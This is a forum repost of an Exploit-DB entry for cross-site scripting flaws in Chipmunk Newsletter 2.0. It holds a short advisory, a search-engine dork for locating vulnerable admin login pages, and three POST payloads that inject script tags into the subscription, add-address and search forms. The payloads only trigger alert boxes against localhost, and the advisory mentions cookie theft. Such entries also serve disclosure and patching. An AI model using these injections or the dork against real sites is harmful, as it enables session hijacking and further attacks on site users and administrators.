- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 33967
- Проверка EDB
-
- Пройдено
- Автор
- B0TELH0
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-01-20
Код:
source: https://www.securityfocus.com/bid/40024/info
Chipmunk Newsletter is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Chipmunk Newsletter 2.0 is vulnerable; other versions may also be affected.
::[ inurl:admin/login.php "Registering Admin" ]::
1 - http://localhost/sub.php
POSTDATA:
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit
2 - http://localhost/admin/addaddress.php
POSTDATA:
email=<script>alert('xss')</script>&lists=1&submit=submit
then we can check it...
http://localhost/admin/searchaddress.php
POSTDATA:
theaddress=<script>alert('xss')</script>&submit=submit
- Источник
- www.exploit-db.com